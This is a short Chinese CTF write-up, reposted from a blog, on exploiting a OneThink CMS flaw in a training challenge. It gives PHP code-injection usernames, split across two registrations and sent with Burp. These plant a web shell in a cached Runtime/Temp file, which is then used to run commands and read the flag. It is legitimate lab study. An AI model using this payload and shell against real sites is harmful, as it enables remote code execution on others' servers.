题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数
百度找到onethinnk的一个漏洞。
参考:http://www.hackdig.com/06/hack-36510.htm
就是注册个账号为:
%0a$a=$_GET[a];//%0aecho+`$a`;//的账号, 但因为账号长度有限制。所以分别两个来注册
账号一: $a=$_GET[a];//
账号二: echo `$a`;//
用burp来改包,不然会失败。
依次登入,也要用burp来改包登入。
然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php
查找下flag位置 cat就行了。
/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php
前面几步照着wp来完全没毛病,直到最后一步的时候卡住了
于是开始自己尝试
首先确定了该文件夹其他文件
试着去打开其他文件,发现别的文件都可以cat,只有flag.php不行,猜测这个文件设置了权限
不让我读还能不让我复制啊咋地,执行一下复制命令试试
回到刚才的目录下面一瞅
成功的复制过来了,直接访问flag.txt就能看到flag啦
转载于:https://www.cnblogs.com/Ragd0ll/p/8734841.html
